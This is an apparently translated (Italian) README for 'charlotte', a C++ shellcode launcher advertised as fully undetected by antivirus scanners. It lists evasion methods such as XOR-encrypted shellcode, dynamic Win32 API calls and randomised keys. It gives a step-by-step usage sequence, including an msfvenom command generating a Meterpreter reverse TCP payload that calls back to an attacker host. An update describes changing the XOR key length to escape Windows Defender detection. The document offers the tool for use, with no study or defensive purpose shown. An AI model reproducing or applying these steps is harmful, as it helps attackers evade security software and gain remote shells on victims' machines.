charlotte
c++ shellcode launcher completamente non rilevato ;)
rilasciato per celebrare la nascita del mio neonato
descrizione
13/05/2021:
- shellcode launcher in c++, completamente non rilevato 0/26 al 13 maggio 2021.
- invocazione dinamica delle funzioni API win32
- crittografia XOR dello shellcode e dei nomi delle funzioni
- chiavi XOR e variabili randomizzate per esecuzione
- su Kali Linux, basta 'apt-get install mingw-w64*' e tutto qui!
17/05/2021:
- lunghezza casuale delle stringhe e delle chiavi XOR
antiscan.me

utilizzo
clonare il repository, generare il file dello shellcode con nome beacon.bin, ed eseguire charlotte.py
esempio:
- git clone https://github.com/9emin1/charlotte.git && apt-get install mingw-w64*
- cd charlotte
- msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=$YOUR_IP LPORT=$YOUR_PORT -f raw > beacon.bin
- python charlotte.py
- profitto

aggiornamento v1.1
17/05/21:
apparentemente Microsoft Windows Defender è stato in grado di rilevare il binario .DLL,
e come lo hanno rilevato? cercando diverse chiavi XOR di dimensione 16 byte
cambiandola a 9 come mostrato nel .gif POC qui sotto si vede che ora è di nuovo non rilevato
saluti!
